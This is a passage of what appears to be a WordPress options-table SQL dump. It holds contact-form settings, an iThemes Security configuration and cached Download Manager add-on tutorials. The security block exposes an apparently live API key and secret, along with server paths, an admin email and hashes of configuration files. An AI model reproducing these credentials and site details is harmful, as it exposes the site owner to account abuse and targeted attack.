Forms!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:24:\"Submission Confirmation \";s:13:\"email_message\";s:29:\"<p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:2;a:2:{s:2:\"id\";i:3;s:8:\"settings\";a:24:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:28\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"label\";s:18:\"Email Notification\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:13:\"email_subject\";s:29:\"New message from {field:name}\";s:13:\"email_message\";s:60:\"<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:19:\"email_message_plain\";s:0:\"\";}}i:3;a:2:{s:2:\"id\";i:4;s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:28\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:47:\"Thank you {field:name} for filling out my form!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:89:\"<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>\";s:19:\"email_message_plain\";s:0:\"\";}}}s:8:\"settings\";a:99:{s:5:\"title\";s:10:\"Contact Me\";s:3:\"key\";s:0:\"\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:26\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:9:\"logged_in\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}s:33:\"container_styles_background-color\";s:0:\"\";s:23:\"container_styles_border\";s:0:\"\";s:29:\"container_styles_border-style\";s:0:\"\";s:29:\"container_styles_border-color\";s:0:\"\";s:22:\"container_styles_color\";s:0:\"\";s:23:\"container_styles_height\";s:0:\"\";s:22:\"container_styles_width\";s:0:\"\";s:26:\"container_styles_font-size\";s:0:\"\";s:23:\"container_styles_margin\";s:0:\"\";s:24:\"container_styles_padding\";s:0:\"\";s:24:\"container_styles_display\";s:0:\"\";s:22:\"container_styles_float\";s:0:\"\";s:34:\"container_styles_show_advanced_css\";s:1:\"0\";s:25:\"container_styles_advanced\";s:0:\"\";s:29:\"title_styles_background-color\";s:0:\"\";s:19:\"title_styles_border\";s:0:\"\";s:25:\"title_styles_border-style\";s:0:\"\";s:25:\"title_styles_border-color\";s:0:\"\";s:18:\"title_styles_color\";s:0:\"\";s:19:\"title_styles_height\";s:0:\"\";s:18:\"title_styles_width\";s:0:\"\";s:22:\"title_styles_font-size\";s:0:\"\";s:19:\"title_styles_margin\";s:0:\"\";s:20:\"title_styles_padding\";s:0:\"\";s:20:\"title_styles_display\";s:0:\"\";s:18:\"title_styles_float\";s:0:\"\";s:30:\"title_styles_show_advanced_css\";s:1:\"0\";s:21:\"title_styles_advanced\";s:0:\"\";s:27:\"row_styles_background-color\";s:0:\"\";s:17:\"row_styles_border\";s:0:\"\";s:23:\"row_styles_border-style\";s:0:\"\";s:23:\"row_styles_border-color\";s:0:\"\";s:16:\"row_styles_color\";s:0:\"\";s:17:\"row_styles_height\";s:0:\"\";s:16:\"row_styles_width\";s:0:\"\";s:20:\"row_styles_font-size\";s:0:\"\";s:17:\"row_styles_margin\";s:0:\"\";s:18:\"row_styles_padding\";s:0:\"\";s:18:\"row_styles_display\";s:0:\"\";s:28:\"row_styles_show_advanced_css\";s:1:\"0\";s:19:\"row_styles_advanced\";s:0:\"\";s:31:\"row-odd_styles_background-color\";s:0:\"\";s:21:\"row-odd_styles_border\";s:0:\"\";s:27:\"row-odd_styles_border-style\";s:0:\"\";s:27:\"row-odd_styles_border-color\";s:0:\"\";s:20:\"row-odd_styles_color\";s:0:\"\";s:21:\"row-odd_styles_height\";s:0:\"\";s:20:\"row-odd_styles_width\";s:0:\"\";s:24:\"row-odd_styles_font-size\";s:0:\"\";s:21:\"row-odd_styles_margin\";s:0:\"\";s:22:\"row-odd_styles_padding\";s:0:\"\";s:22:\"row-odd_styles_display\";s:0:\"\";s:32:\"row-odd_styles_show_advanced_css\";s:1:\"0\";s:23:\"row-odd_styles_advanced\";s:0:\"\";s:35:\"success-msg_styles_background-color\";s:0:\"\";s:25:\"success-msg_styles_border\";s:0:\"\";s:31:\"success-msg_styles_border-style\";s:0:\"\";s:31:\"success-msg_styles_border-color\";s:0:\"\";s:24:\"success-msg_styles_color\";s:0:\"\";s:25:\"success-msg_styles_height\";s:0:\"\";s:24:\"success-msg_styles_width\";s:0:\"\";s:28:\"success-msg_styles_font-size\";s:0:\"\";s:25:\"success-msg_styles_margin\";s:0:\"\";s:26:\"success-msg_styles_padding\";s:0:\"\";s:26:\"success-msg_styles_display\";s:0:\"\";s:36:\"success-msg_styles_show_advanced_css\";s:1:\"0\";s:27:\"success-msg_styles_advanced\";s:0:\"\";s:33:\"error_msg_styles_background-color\";s:0:\"\";s:23:\"error_msg_styles_border\";s:0:\"\";s:29:\"error_msg_styles_border-style\";s:0:\"\";s:29:\"error_msg_styles_border-color\";s:0:\"\";s:22:\"error_msg_styles_color\";s:0:\"\";s:23:\"error_msg_styles_height\";s:0:\"\";s:22:\"error_msg_styles_width\";s:0:\"\";s:26:\"error_msg_styles_font-size\";s:0:\"\";s:23:\"error_msg_styles_margin\";s:0:\"\";s:24:\"error_msg_styles_padding\";s:0:\"\";s:24:\"error_msg_styles_display\";s:0:\"\";s:34:\"error_msg_styles_show_advanced_css\";s:1:\"0\";s:25:\"error_msg_styles_advanced\";s:0:\"\";}}','yes'),(47256,'widget_ninja_forms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(55647,'itsec-storage','a:14:{s:6:\"global\";a:43:{s:15:\"lockout_message\";s:5:\"error\";s:20:\"user_lockout_message\";s:64:\"You have been locked out due to too many invalid login attempts.\";s:25:\"community_lockout_message\";s:77:\"Your IP address has been flagged as a threat by the iThemes Security network.\";s:9:\"blacklist\";b:1;s:15:\"blacklist_count\";i:3;s:16:\"blacklist_period\";i:7;s:14:\"lockout_period\";i:15;s:18:\"lockout_white_list\";a:0:{}s:12:\"log_rotation\";i:14;s:17:\"file_log_rotation\";i:180;s:8:\"log_type\";s:8:\"database\";s:12:\"log_location\";s:68:\"/home4/zphiblgz/public_html/wp-content/uploads/ithemes-security/logs\";s:8:\"log_info\";s:51:\"zeta-phi-beta-sorori-loz5oZZlHsatk5zHqa1gBs2f2G6FX6\";s:14:\"allow_tracking\";b:0;s:11:\"write_files\";b:1;s:10:\"nginx_file\";s:38:\"/home4/zphiblgz/public_html/nginx.conf\";s:24:\"infinitewp_compatibility\";b:0;s:11:\"did_upgrade\";b:0;s:9:\"lock_file\";b:0;s:5:\"proxy\";s:9:\"automatic\";s:12:\"proxy_header\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"hide_admin_bar\";b:0;s:16:\"show_error_codes\";b:0;s:19:\"show_security_check\";b:0;s:5:\"build\";i:4121;s:13:\"initial_build\";i:4118;s:20:\"activation_timestamp\";i:1515457054;s:11:\"cron_status\";i:1;s:8:\"use_cron\";b:1;s:14:\"cron_test_time\";i:1632358900;s:19:\"enable_grade_report\";b:0;s:10:\"server_ips\";a:0:{}s:13:\"feature_flags\";a:0:{}s:12:\"manage_group\";a:0:{}s:24:\"licensed_hostname_prompt\";b:0;s:14:\"proxy_override\";b:0;s:25:\"show_new_dashboard_notice\";b:0;s:18:\"notification_email\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:12:\"backup_email\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:19:\"email_notifications\";b:1;s:12:\"digest_email\";b:0;s:16:\"digest_last_sent\";i:1508602094;s:15:\"digest_messages\";a:0:{}}s:19:\"network-brute-force\";a:5:{s:7:\"api_key\";s:32:\"b1616hBil5Oa24j3qCn8P3T8fGTAVikd\";s:10:\"api_secret\";s:128:\"iV95sUWyPMvIWC73JkhVPRp7u9J4adt1T5917vFxAy29G6oK0GGsom7sJet6bOp78s3kq3Zq3IgAM1dnlngTGw2qMSuE95KFxBok0V6XYx2B5KZ66Bs2be50W11081QV\";s:10:\"enable_ban\";b:1;s:13:\"updates_optin\";b:1;s:7:\"api_nag\";b:0;}s:3:\"ssl\";a:3:{s:11:\"require_ssl\";s:8:\"disabled\";s:8:\"frontend\";i:0;s:5:\"admin\";b:0;}s:16:\"wordpress-tweaks\";a:13:{s:18:\"wlwmanifest_header\";b:0;s:14:\"edituri_header\";b:0;s:12:\"comment_spam\";b:0;s:11:\"file_editor\";b:1;s:14:\"disable_xmlrpc\";i:0;s:22:\"allow_xmlrpc_multiauth\";b:0;s:8:\"rest_api\";s:15:\"restrict-access\";s:12:\"login_errors\";b:0;s:21:\"force_unique_nicename\";b:0;s:27:\"disable_unused_author_pages\";b:0;s:16:\"block_tabnapping\";b:0;s:21:\"valid_user_login_type\";s:4:\"both\";s:26:\"patch_thumb_file_traversal\";b:1;}s:9:\"ban-users\";a:4:{s:7:\"default\";b:0;s:16:\"enable_ban_lists\";b:1;s:10:\"agent_list\";a:0:{}s:19:\"server_config_limit\";i:100;}s:11:\"file-change\";a:11:{s:9:\"file_list\";a:0:{}s:5:\"types\";a:39:{i:0;s:4:\".log\";i:1;s:3:\".mo\";i:2;s:3:\".po\";i:3;s:4:\".bmp\";i:4;s:4:\".gif\";i:5;s:4:\".ico\";i:6;s:4:\".jpe\";i:7;s:5:\".jpeg\";i:8;s:4:\".jpg\";i:9;s:4:\".png\";i:10;s:4:\".psd\";i:11;s:4:\".raw\";i:12;s:4:\".svg\";i:13;s:4:\".tif\";i:14;s:5:\".tiff\";i:15;s:4:\".aif\";i:16;s:5:\".flac\";i:17;s:4:\".m4a\";i:18;s:4:\".mp3\";i:19;s:4:\".oga\";i:20;s:4:\".ogg\";i:22;s:3:\".ra\";i:23;s:4:\".wav\";i:24;s:4:\".wma\";i:25;s:4:\".asf\";i:26;s:4:\".avi\";i:27;s:4:\".mkv\";i:28;s:4:\".mov\";i:29;s:4:\".mp4\";i:30;s:4:\".mpe\";i:31;s:5:\".mpeg\";i:32;s:4:\".mpg\";i:33;s:4:\".ogv\";i:34;s:3:\".qt\";i:35;s:3:\".rm\";i:36;s:4:\".vob\";i:37;s:5:\".webm\";i:38;s:3:\".wm\";i:39;s:4:\".wmv\";}s:15:\"expected_hashes\";a:4:{s:41:\"/home4/zphiblgz/public_html/wp-config.php\";s:32:\"4ae4a91d0458e814383517606a36a302\";s:37:\"/home4/zphiblgz/public_html/.htaccess\";s:32:\"88241333256f2aecb7b0b6b0bfc74ffe\";s:37:\"/home2/zphiblgz/public_html/.htaccess\";s:32:\"e5acf44b8e740d610a6fc33f42dff6fe\";s:41:\"/home2/zphiblgz/public_html/wp-config.php\";s:32:\"1ff7e833ec7b6cadc719886b7fc1d7a9\";}s:9:\"last_scan\";i:73643;s:12:\"notify_admin\";b:1;s:12:\"show_warning\";b:0;s:5:\"split\";b:0;s:6:\"method\";s:7:\"exclude\";s:8:\"last_run\";i:1528700960;s:10:\"last_chunk\";b:0;s:5:\"email\";b:1;}s:9:\"away-mode\";a:7:{s:4:\"type\";s:5:\"daily\";s:13:\"override_type\";s:0:\"\";s:12:\"override_end\";i:0;s:5:\"start\";i:1515477600;s:10:\"start_time\";i:3600;s:3:\"end\";i:1515535200;s:8:\"end_time\";i:61200;}s:13:\"404-detection\";a:4:{s:12:\"check_period\";i:5;s:15:\"error_threshold\";i:20;s:10:\"white_list\";a:9:{i:0;s:12:\"/favicon.ico\";i:1;s:11:\"/robots.txt\";i:2;s:21:\"/apple-touch-icon.png\";i:3;s:33:\"/apple-touch-icon-precomposed.png\";i:4;s:17:\"/wp-content/cache\";i:5;s:18:\"/browserconfig.xml\";i:6;s:16:\"/crossdomain.xml\";i:7;s:11:\"/labels.rdf\";i:8;s:27:\"/trafficbasedsspsitemap.xml\";}s:5:\"types\";a:5:{i:0;s:4:\".jpg\";i:1;s:5:\".jpeg\";i:2;s:4:\".png\";i:3;s:4:\".gif\";i:4;s:4:\".css\";}}s:16:\"strong-passwords\";a:1:{s:4:\"role\";s:13:\"administrator\";}s:13:\"system-tweaks\";a:10:{s:13:\"protect_files\";b:1;s:18:\"directory_browsing\";b:1;s:15:\"request_methods\";b:1;s:24:\"suspicious_query_strings\";b:1;s:22:\"non_english_characters\";b:1;s:16:\"long_url_strings\";b:1;s:17:\"write_permissions\";b:1;s:11:\"uploads_php\";b:1;s:11:\"plugins_php\";b:1;s:10:\"themes_php\";b:1;}s:11:\"brute-force\";a:4:{s:17:\"max_attempts_host\";i:5;s:17:\"max_attempts_user\";i:10;s:12:\"check_period\";i:5;s:14:\"auto_ban_admin\";b:0;}s:19:\"notification-center\";a:8:{s:9:\"last_sent\";a:1:{s:6:\"digest\";i:1508602094;}s:9:\"resend_at\";a:0:{}s:4:\"data\";a:0:{}s:15:\"last_mail_error\";s:36:\"Could not instantiate mail function.\";s:13:\"notifications\";a:4:{s:6:\"digest\";a:6:{s:8:\"schedule\";s:5:\"daily\";s:7:\"enabled\";b:0;s:9:\"user_list\";a:1:{i:0;i:1;}s:14:\"recipient_type\";s:7:\"default\";s:7:\"subject\";N;s:15:\"previous_emails\";a:0:{}}s:7:\"lockout\";a:5:{s:7:\"enabled\";b:1;s:9:\"user_list\";a:1:{i:0;i:1;}s:14:\"recipient_type\";s:7:\"default\";s:7:\"subject\";N;s:15:\"previous_emails\";a:0:{}}s:6:\"backup\";a:2:{s:10:\"email_list\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:7:\"subject\";N;}s:11:\"file-change\";a:5:{s:7:\"enabled\";b:1;s:9:\"user_list\";a:1:{i:0;i:1;}s:14:\"recipient_type\";s:6:\"custom\";s:7:\"subject\";N;s:15:\"previous_emails\";a:0:{}}}s:12:\"admin_emails\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:10:\"from_email\";s:0:\"\";s:18:\"default_recipients\";a:1:{s:9:\"user_list\";a:1:{i:0;i:1;}}}s:21:\"password-requirements\";a:2:{s:20:\"enabled_requirements\";a:1:{s:8:\"strength\";b:1;}s:20:\"requirement_settings\";a:1:{s:8:\"strength\";a:1:{s:5:\"group\";a:1:{i:0;s:36:\"b2af7919-5b5b-499d-8d66-8515115417b9\";}}}}s:11:\"user-groups\";a:1:{s:14:\"default_groups\";a:5:{s:13:\"administrator\";s:36:\"b2af7919-5b5b-499d-8d66-8515115417b9\";s:6:\"editor\";s:36:\"cb5b5fae-147e-43ed-9d8d-28f269ceaece\";s:6:\"author\";s:36:\"c8227cef-e1af-4960-b7d1-979af7fc1735\";s:11:\"contributor\";s:36:\"4f0849b1-1853-4643-bb52-4c4ab5a75ebd\";s:10:\"subscriber\";s:36:\"c224ea8f-e7c4-40ef-a7d6-ba729e7639fd\";}}}','yes'),(47260,'nf_admin_notice','a:3:{s:16:\"one_week_support\";a:3:{s:5:\"start\";s:9:\"9/20/2017\";s:3:\"int\";i:7;s:9:\"dismissed\";i:1;}s:14:\"allow_tracking\";a:2:{s:5:\"start\";s:9:\"9/13/2017\";s:3:\"int\";i:0;}s:12:\"data_cleanup\";a:2:{s:5:\"start\";s:9:\"6/11/2018\";s:3:\"int\";i:0;}}','yes'),(47314,'ninja_forms_allow_tracking','1','yes'),(46377,'__wpdm_freeaddons','{\"post\":[{\"ID\":58950,\"post_author\":\"1\",\"post_date\":\"2017-06-11 13:18:12\",\"post_date_gmt\":\"2017-06-11 13:18:12\",\"post_content\":\"WP-Filebase Data Importer for WordPress Download Manager. You asked for this and here it is now :)\\r\\n\\r\\nPlease follow the steps to import data:\\r\\n<ol>\\r\\n \\t<li>Install &amp; activate Wordpress Download Manager<\\/li>\\r\\n \\t<li>Install &amp; activate this addon<\\/li>\\r\\n \\t<li>please go to Admin Menu &gt;&gt; Download &gt;&gt; Settings &gt;&gt; Filebase Import:\\r\\n<img class=\\\"alignnone size-large wp-image-58951\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2017\\/06\\/filebase-import-settings-1024x795.png\\\" alt=\\\"filebase import settings\\\" width=\\\"960\\\" height=\\\"745\\\" \\/><\\/li>\\r\\n \\t<li>Check the files you want to import<\\/li>\\r\\n \\t<li>Click \\\"Save Setting\\\"<\\/li>\\r\\n \\t<li>Done<\\/li>\\r\\n<\\/ol>\",\"post_title\":\"WP-Filebase Data Importer\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"wp-filebase-data-importer\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-06-11 13:18:12\",\"post_modified_gmt\":\"2017-06-11 13:18:12\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"https:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=58950\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"0\",\"filter\":\"raw\"},{\"ID\":27148,\"post_author\":\"1\",\"post_date\":\"2015-03-15 10:15:39\",\"post_date_gmt\":\"2015-03-15 10:15:39\",\"post_content\":\"Box offers\\u00a0up to 10 GB free cloud storage and file sharing services that enables you to securely share and access files online. Now you can use the space to store your download manager file. Using this add-on you can explore files in Box storage and attach them with Download Manager.\",\"post_title\":\"Box.com Explorer\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"box-com-explorer\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-02-03 15:01:37\",\"post_modified_gmt\":\"2017-02-03 15:01:37\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=27148\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"0\",\"filter\":\"raw\"},{\"ID\":26131,\"post_author\":\"1\",\"post_date\":\"2015-02-16 17:25:33\",\"post_date_gmt\":\"2015-02-16 17:25:33\",\"post_content\":\"DropBox Explorer add-on will add a new button with your Download Manager to explore files in dropbox and attach with your download manager package.\\r\\n\\r\\n<strong>Usage:<\\/strong>\\r\\n\\r\\n<a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/how-to-use-dropbox-to-store-files-and-allow-users-to-download-then-from-your-website\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">How to use Dropbox to store your files and allow users to download them from your website<\\/a>\",\"post_title\":\"DropBox Explorer\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"dropbox-explorer\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-04-27 12:17:04\",\"post_modified_gmt\":\"2017-04-27 12:17:04\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=26131\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"8\",\"filter\":\"raw\"},{\"ID\":25300,\"post_author\":\"1\",\"post_date\":\"2015-01-26 19:26:14\",\"post_date_gmt\":\"2015-01-26 19:26:14\",\"post_content\":\"Google Drive Explorer Add-on helps you to connect with Google Drive, you can explore your Google drive files, upload files to Google drive and attach with your package. You can control your Google drive directly from you site admin panel, use free 15 GB space and save your bandwidth.\\r\\n\\r\\nSetting Up Google Drive Explorer Add-on:\\r\\n<ol>\\r\\n \\t<li>Visit <strong><a href=\\\"https:\\/\\/console.developers.google.com\\/projectcreate\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Google API Console<\\/a><\\/strong>, Create New Project:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61671 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/New-Google-API-Project-1024x328.png\\\" alt=\\\"New Google API Project\\\" width=\\\"960\\\" height=\\\"308\\\" \\/><\\/li>\\r\\n \\t<li>After hit create button, the next page you will see:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61672 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Select-Google-API-Project-1024x404.png\\\" alt=\\\"Select Google API Project\\\" width=\\\"960\\\" height=\\\"379\\\" \\/><\\/li>\\r\\n \\t<li>Now, click on \\\"Select a project\\\" or blue \\\"Select\\\" button to select your project from that page:\\r\\n<img class=\\\"alignnone wp-image-61673 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Select-Project-Popup-1024x951.png\\\" alt=\\\"Select Project Popup\\\" width=\\\"960\\\" height=\\\"892\\\" \\/><\\/li>\\r\\n \\t<li>After selecting project you will see the following page, then click on \\\"Go to API overview\\\":\\r\\n<img class=\\\"alignnone size-large wp-image-61674\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Google-API-overview-1024x776.png\\\" alt=\\\"Google API overview\\\" width=\\\"960\\\" height=\\\"728\\\" \\/><\\/li>\\r\\n \\t<li>At this step, you will see the following page, click on \\\"ENABLE APIS AND SERVICES\\\":\\r\\n<img class=\\\"alignnone size-large wp-image-61675\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/ENABLE-APIS-AND-SERVICES-1024x323.png\\\" alt=\\\"ENABLE APIS AND SERVICES\\\" width=\\\"960\\\" height=\\\"303\\\" \\/><\\/li>\\r\\n \\t<li>From the following page, search for <strong>Google Drive API<\\/strong> and <strong>Google Picker API<\\/strong>, enable both:\\r\\n<img class=\\\"alignnone size-large wp-image-61676\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Enable-Google-API-1024x596.png\\\" alt=\\\"Enable Google API\\\" width=\\\"960\\\" height=\\\"559\\\" \\/>\\r\\n<ol>\\r\\n \\t<li>Search \\\"Google Picker API\\\"\\r\\n<img class=\\\"alignnone size-large wp-image-61677\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Search-Google-Picker-API-1024x404.png\\\" alt=\\\"Search Google Picker API\\\" width=\\\"960\\\" height=\\\"379\\\" \\/><\\/li>\\r\\n \\t<li>Enable API:\\r\\n<img class=\\\"alignnone size-large wp-image-61678\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/API-Details-1024x311.png\\\" alt=\\\"API Details\\\" width=\\\"960\\\" height=\\\"292\\\" \\/><\\/li>\\r\\n \\t<li>Select and enable \\\"Google Drive API\\\" in that same way.<\\/li>\\r\\n<\\/ol>\\r\\n<\\/li>\\r\\n \\t<li>After enabling both API your dashboard will look like:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61679 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/API-Dashboard-1024x474.png\\\" alt=\\\"API Dashboard\\\" width=\\\"960\\\" height=\\\"444\\\" \\/><\\/li>\\r\\n \\t<li>Setup consent screen:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61682 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Setup-Consent-Screen-1024x845.png\\\" alt=\\\"Setup Consent Screen\\\" width=\\\"960\\\" height=\\\"792\\\" \\/><\\/li>\\r\\n \\t<li>To set up API access credentials go to \\\"Credentials\\\" menu:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61683 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/set-up-API-access-credentials-1024x759.png\\\" alt=\\\"setup API access credentials\\\" width=\\\"960\\\" height=\\\"712\\\" \\/><\\/li>\\r\\n \\t<li>Click on \\\"OAuth client ID\\\" button to create new client id:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61684 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Create-OAuth-client-ID-1024x750.png\\\" alt=\\\"Create OAuth client ID\\\" width=\\\"960\\\" height=\\\"703\\\" \\/>\\r\\nRedirect URI should be like <strong>http:\\/\\/your-site.com\\/wp-admin\\/?page=wpdm-google-drive<\\/strong> and set your site URL for \\\"Authorized JavaScript origins\\\", however, you can copy the URL from download manager Settings Page &gt;&gt; Cloud Storage &gt;&gt; Google Drive API Credential Settings 